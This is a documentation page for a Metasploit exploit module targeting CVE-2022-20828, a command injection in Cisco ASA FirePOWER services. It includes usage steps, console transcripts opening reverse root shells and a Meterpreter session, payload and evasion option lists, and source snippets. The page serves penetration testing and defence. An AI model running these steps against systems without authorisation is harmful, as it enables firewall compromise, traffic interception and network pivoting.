Cisco ASA-X with FirePOWER Services Authenticated Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/cisco_asax_sfr_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco ASA-X with FirePOWER Services Authenticated Command Injection
Module: exploit/linux/http/cisco_asax_sfr_rce
Source code: modules/exploits/linux/http/cisco_asax_sfr_rce.rb
Disclosure date: 2022-06-22
Last modification time: 2022-09-02 08:44:04 +0000
Supported architecture(s): cmd, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-20828

This module exploits an authenticated command injection vulnerability affecting Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's ASDM web server and lands in the FirePower Services SFR module's Linux virtual machine as the root user. Access to the virtual machine allows the attacker to pivot to the inside network, and access the outside network. Also, the SFR virtual machine is running snort on the traffic flowing through the ASA, so the attacker should have access to this diverted traffic as well. This module requires ASDM credentials in order to traverse the ASDM interface. A similar attack can be performed via Cisco CLI (over SSH), although that isn't implemented here. Finally, it's worth noting that this attack bypasses the affects of the lockdown-sensor command (e.g. the virtual machine's bash shell shouldn't be available but this attack makes it available). Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service, and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will receive no patch: 6.2.2 and earlier, 6.3., 6.5., and 6.7.*.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/cisco_asax_sfr_rce
msf exploit(cisco_asax_sfr_rce) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Description

This module exploits an authenticated command injection vulnerability affecting Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's ASDM web server and lands in the FirePower Services SFR module's Linux virtual machine as the root user. Access to the virtual machine allows the attacker to pivot to the inside network, and access the outside network. Also, the SFR virtual machine is running snort on the traffic flowing through the ASA, so the attacker should have access to this diverted traffic as well.

This module requires ASDM credentials in order to traverse the ASDM interface. A similar attack can be performed via Cisco CLI (over SSH), although that isn't implemented here. This attack also assumes the module is installed and configured.

Finally, it's worth noting that this attack bypasses the effects of the lockdown-sensor command (e.g. the virtual machine's bash shell shouldn't be available but this attack makes it available).

Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service, and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will receive no patch: 6.2.2 and earlier, 6.3., 6.5., and 6.7.*.

Setup

Cisco ASA that support the FirePOWER Services module are, to our knowledge, strictly hardware firewalls and not capable of being emulated. As such, testing requires a physical device. Once a device is acquired, you'll additionally need access to Cisco downloads of ASDM, ASA software, and the FirePOWER Services Software for ASA. Unfortunately, Cisco hides these behind a paywall (or a "contract" wall).

However, if you do acquire a Cisco ASA that supports the FirePOWER Services module, then it will likely come with the module pre-installed. These systems do support downgrading of the module via uninstall and reinstallation. If you need to follow that course, then I found the following guide to be an excellent guide that demonstrates how to install the FirePOWER module from boot image through full installation.

This particular module exploits the FirePOWER module via ASDM, so you'll need that installed and running as well. Likely, the ASA will have an ASDM binary package already installed, but if not you'll need to download that from Cisco and copy it onto the ASA. However, once that is complete, you can run the following commands to start ASDM and enable it on the inside/outside network.

asdm image disk0:/asdm<version>.bin
http server enable
http network mask inside
http network mask outside

Where network and mask are who you want to be able to access it and inside is the zone. E.g. "0.0.0.0 0.0.0.0 outside" is the internet. And that should satisfy the pre-requisites for exploitation (ASDM+sfr).

Verification Steps


  • Follow setup steps above.
  • Do: use exploit/linux/http/cisco_asax_sfr_rce
  • Do: set USERNAME <username>
  • Do: set PASSWORD <password>
  • Do: set RHOST <ip>
  • Do: set LHOST <ip>
  • Do: check
  • Verify the remote host is vulnerable.
  • Do: run
  • Verify the module acquires a root shell

Options


USERNAME

The username to authenticate with the ASDM http web server with.

PASSWORD

The password to authenticate with the ASDM http web server with.

Scenarios


Successful exploitation of ASA 5506-X with FirePOWER Services for a root shell

msf6 > use exploit/linux/http/cisco_asax_sfr_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
RHOST => 10.0.0.21
msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
msf6 exploit(linux/http/cisco_asax_sfr_rce) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully executed the 'id' command.
[*] Executing Shell Dropper for cmd/unix/reverse_bash
[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.21:43056 ) at 2022-04-21 12:49:15 -0700

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux

Successful exploitation of ASA 5506-X with FirePOWER Services for a Meterpreter shell

msf6 > use exploit/linux/http/cisco_asax_sfr_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
RHOST => 10.0.0.21
msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
msf6 exploit(linux/http/cisco_asax_sfr_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/cisco_asax_sfr_rce) > run

[*] Started reverse TCP handler on 10.0.0.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully executed the 'id' command.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://10.0.0.2:8080/FeB2t5vKpa
[*] Client 10.0.0.21 (curl/7.48.0) requested /FeB2t5vKpa
[*] Sending payload to 10.0.0.21 (curl/7.48.0)
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.21:43058 ) at 2022-04-21 12:51:44 -0700
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

meterpreter > shell
Process 6315 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux

Go back to menu.

Msfconsole Usage


Here is how the linux/http/cisco_asax_sfr_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/cisco_asax_sfr_rce

[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/cisco_asax_sfr_rce) > show info

       Name: Cisco ASA-X with FirePOWER Services Authenticated Command Injection
     Module: exploit/linux/http/cisco_asax_sfr_rce
   Platform: Unix, Linux
       Arch: cmd, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-06-22

Provided by:
  jbaines-r7

Module side effects:
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Shell Dropper
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                         to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME                    yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authenticated command injection 
  vulnerability affecting Cisco ASA-X with FirePOWER Services. This 
  exploit is executed through the ASA's ASDM web server and lands in 
  the FirePower Services SFR module's Linux virtual machine as the 
  root user. Access to the virtual machine allows the attacker to 
  pivot to the inside network, and access the outside network. Also, 
  the SFR virtual machine is running snort on the traffic flowing 
  through the ASA, so the attacker should have access to this diverted 
  traffic as well. This module requires ASDM credentials in order to 
  traverse the ASDM interface. A similar attack can be performed via 
  Cisco CLI (over SSH), although that isn't implemented here. Finally, 
  it's worth noting that this attack bypasses the affects of the 
  `lockdown-sensor` command (e.g. the virtual machine's bash shell 
  shouldn't be available but this attack makes it available). Cisco 
  assigned this issue CVE-2022-20828. The issue affects all Cisco ASA 
  that support the ASA FirePOWER module (at least Cisco ASA-X with 
  FirePOWER Service, and Cisco ISA 3000). The vulnerability has been 
  patched in ASA FirePOWER module versions 6.2.3.19, 6.4.0.15, 6.6.7, 
  and 7.0.21. The following versions will receive no patch: 6.2.2 and 
  earlier, 6.3.*, 6.5.*, and 6.7.*.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-20828
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG
  https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/
  https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html

Module Options


This is a complete list of options available in the linux/http/cisco_asax_sfr_rce exploit:

msf6 exploit(linux/http/cisco_asax_sfr_rce) > show options

Module options (exploit/linux/http/cisco_asax_sfr_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                         0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Advanced Options


Here is a complete list of advanced options supported by the linux/http/cisco_asax_sfr_rce exploit:

msf6 exploit(linux/http/cisco_asax_sfr_rce) > show advanced

Module advanced options (exploit/linux/http/cisco_asax_sfr_rce):

   Name                     Current Setting                        Required  Description
   ----                     ---------------                        --------  -----------
   AllowNoCleanup           false                                  no        Allow exploitation without the possibility of cleaning up files
   AutoCheck                true                                   no        Run check before exploit
   CMDSTAGER::DECODER                                              no        The decoder stub to use.
   CMDSTAGER::FLAVOR        auto                                   no        The CMD Stager to use. (Accepted: auto, curl, wget)
   CMDSTAGER::SSL           false                                  no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                 no        Writable directory for staged files
   CMDSTAGER::URIPATH                                              no        Payload URI path for supported stagers
   ContextInformationFile                                          no        The information file that contains context information
   DOMAIN                   WORKSTATION                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                   no        Conform to IIS, should work for most servers. Only set to false for
                                                                             non-IIS servers
   DisablePayloadHandler    false                                  no        Disable the handler code for the selected payload
   EXE::Custom                                                     no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                  no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                  no        Use the default template in case the specified one is missing
   EXE::Inject              false                                  no        Set to preserve the original EXE function
   EXE::OldMethod           false                                  no        Set to use the substitution EXE generation method.
   EXE::Path                                                       no        The directory in which to look for the executable template
   EXE::Template                                                   no        The executable template file name.
   EnableContextEncoding    false                                  no        Use transient context when encoding payloads
   FileDropperDelay                                                no        Delay in seconds before attempting cleanup
   FingerprintCheck         true                                   no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                  no        Override check result
   HttpClientTimeout                                               no        HTTP connection and receive timeout
   HttpPassword                                                    no        The HTTP password to specify for authentication
   HttpRawHeaders                                                  no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                  no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                  no        Show HTTP headers only in HttpTrace
   HttpUsername                                                    no        The HTTP username to specify for authentication
   ListenerBindAddress                                             no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                no        The port to bind to if different from SRVPORT
   ListenerComm                                                    no        The specific communication channel to use for this service
   MSI::Custom                                                     no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                  no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                       no        The directory in which to look for the msi template
   MSI::Template                                                   no        The msi template file name
   MSI::UAC                 false                                  no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                       no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression           false                                  no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                   yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
                                                                             uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
                                                                             .2)
   SendRobots               false                                  no        Return a robots.txt file if asked for one
   URIHOST                                                         no        Host to use in URI (useful for tunnels)
   URIPORT                                                         no        Port to use in URI (useful for tunnels)
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS   no        The User-Agent header to use for all requests
                            X 12.2; rv:97.0) Gecko/20100101 Firef
                            ox/97.0
   VERBOSE                  false                                  no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module
   WfsDelay                 2                                      no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter_reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-
                                                           framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy
                                                           but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/cisco_asax_sfr_rce module can exploit:

msf6 exploit(linux/http/cisco_asax_sfr_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Shell Dropper
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/cisco_asax_sfr_rce exploit:

msf6 exploit(linux/http/cisco_asax_sfr_rce) > show payloads

Compatible Payloads
===================

   #   Name                                          Disclosure Date  Rank    Check  Description
   -   ----                                          ---------------  ----    -----  -----------
   0   payload/generic/custom                                         normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                 normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                              normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                                   normal  No     Interact with Established SSH Connection
   4   payload/linux/x64/exec                                         normal  No     Linux Execute Command
   5   payload/linux/x64/meterpreter/bind_tcp                         normal  No     Linux Mettle x64, Bind TCP Stager
   6   payload/linux/x64/meterpreter/reverse_tcp                      normal  No     Linux Mettle x64, Reverse TCP Stager
   7   payload/linux/x64/meterpreter_reverse_http                     normal  No     Linux Meterpreter, Reverse HTTP Inline
   8   payload/linux/x64/meterpreter_reverse_https                    normal  No     Linux Meterpreter, Reverse HTTPS Inline
   9   payload/linux/x64/meterpreter_reverse_tcp                      normal  No     Linux Meterpreter, Reverse TCP Inline
   10  payload/linux/x64/pingback_bind_tcp                            normal  No     Linux x64 Pingback, Bind TCP Inline
   11  payload/linux/x64/pingback_reverse_tcp                         normal  No     Linux x64 Pingback, Reverse TCP Inline
   12  payload/linux/x64/shell/bind_tcp                               normal  No     Linux Command Shell, Bind TCP Stager
   13  payload/linux/x64/shell/reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager
   14  payload/linux/x64/shell_bind_ipv6_tcp                          normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   15  payload/linux/x64/shell_bind_tcp                               normal  No     Linux Command Shell, Bind TCP Inline
   16  payload/linux/x64/shell_bind_tcp_random_port                   normal  No     Linux Command Shell, Bind TCP Random Port Inline
   17  payload/linux/x64/shell_reverse_ipv6_tcp                       normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   18  payload/linux/x64/shell_reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/cisco_asax_sfr_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/cisco_asax_sfr_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, defl
                                                            ate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The target did not respond to the check.


Here is a relevant code snippet related to the "The target did not respond to the check." error message:

106:	      {
107:	        'User-Agent' => 'ASDM/ Java/1',
108:	        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
109:	      }
110:	    })
111:	    return CheckCode::Unknown('The target did not respond to the check.') unless res
112:	    return CheckCode::Safe('Authentication failed.') if res.code == 401
113:	    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
114:	
115:	    if res.body.include?('Invalid do command uid=0(root)')
116:	      return CheckCode::Vulnerable("Successfully executed the 'id' command.")

Authentication failed.


Here is a relevant code snippet related to the "Authentication failed." error message:

107:	        'User-Agent' => 'ASDM/ Java/1',
108:	        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
109:	      }
110:	    })
111:	    return CheckCode::Unknown('The target did not respond to the check.') unless res
112:	    return CheckCode::Safe('Authentication failed.') if res.code == 401
113:	    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
114:	
115:	    if res.body.include?('Invalid do command uid=0(root)')
116:	      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
117:	    end

Received unexpected HTTP status code: <RES.CODE>.


Here is a relevant code snippet related to the "Received unexpected HTTP status code: <RES.CODE>." error message:

108:	        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
109:	      }
110:	    })
111:	    return CheckCode::Unknown('The target did not respond to the check.') unless res
112:	    return CheckCode::Safe('Authentication failed.') if res.code == 401
113:	    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
114:	
115:	    if res.body.include?('Invalid do command uid=0(root)')
116:	      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
117:	    end
118:	

Successfully executed the 'id' command.


Here is a relevant code snippet related to the "Successfully executed the 'id' command." error message:

111:	    return CheckCode::Unknown('The target did not respond to the check.') unless res
112:	    return CheckCode::Safe('Authentication failed.') if res.code == 401
113:	    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
114:	
115:	    if res.body.include?('Invalid do command uid=0(root)')
116:	      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
117:	    end
118:	
119:	    CheckCode::Safe('The command injection does not appear to work.')
120:	  end
121:	

The command injection does not appear to work.


Here is a relevant code snippet related to the "The command injection does not appear to work." error message:

114:	
115:	    if res.body.include?('Invalid do command uid=0(root)')
116:	      return CheckCode::Vulnerable("Successfully executed the 'id' command.")
117:	    end
118:	
119:	    CheckCode::Safe('The command injection does not appear to work.')
120:	  end
121:	
122:	  def execute_command(cmd, _opts = {})
123:	    # base64 encode the payload to work around bad characters and then uri encode
124:	    # the whole thing before yeeting it at the server

The target did not respond.


Here is a relevant code snippet related to the "The target did not respond." error message:

132:	        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
133:	      }
134:	    })
135:	
136:	    if res
137:	      fail_with(Failure::Unreachable, 'The target did not respond.') unless res
138:	      fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401
139:	      fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
140:	    end
141:	
142:	    if session_created?

Could not log in. Verify credentials.


Here is a relevant code snippet related to the "Could not log in. Verify credentials." error message:

133:	      }
134:	    })
135:	
136:	    if res
137:	      fail_with(Failure::Unreachable, 'The target did not respond.') unless res
138:	      fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401
139:	      fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
140:	    end
141:	
142:	    if session_created?
143:	      # technically speaking, bash can hold the connection open and skip all the res checks

Received unexpected HTTP status code: <RES.CODE>.


Here is a relevant code snippet related to the "Received unexpected HTTP status code: <RES.CODE>." error message:

134:	    })
135:	
136:	    if res
137:	      fail_with(Failure::Unreachable, 'The target did not respond.') unless res
138:	      fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401
139:	      fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
140:	    end
141:	
142:	    if session_created?
143:	      # technically speaking, bash can hold the connection open and skip all the res checks
144:	      # also passing the res checks doesn't actually mean that the target was exploited so

The exploit was thrown but not session was created.


Here is a relevant code snippet related to the "The exploit was thrown but not session was created." error message:

143:	      # technically speaking, bash can hold the connection open and skip all the res checks
144:	      # also passing the res checks doesn't actually mean that the target was exploited so
145:	      # check a session was created to get verification
146:	      print_good('Session created!')
147:	    else
148:	      fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.')
149:	    end
150:	  end
151:	
152:	  def exploit
153:	    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • jbaines-r7

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.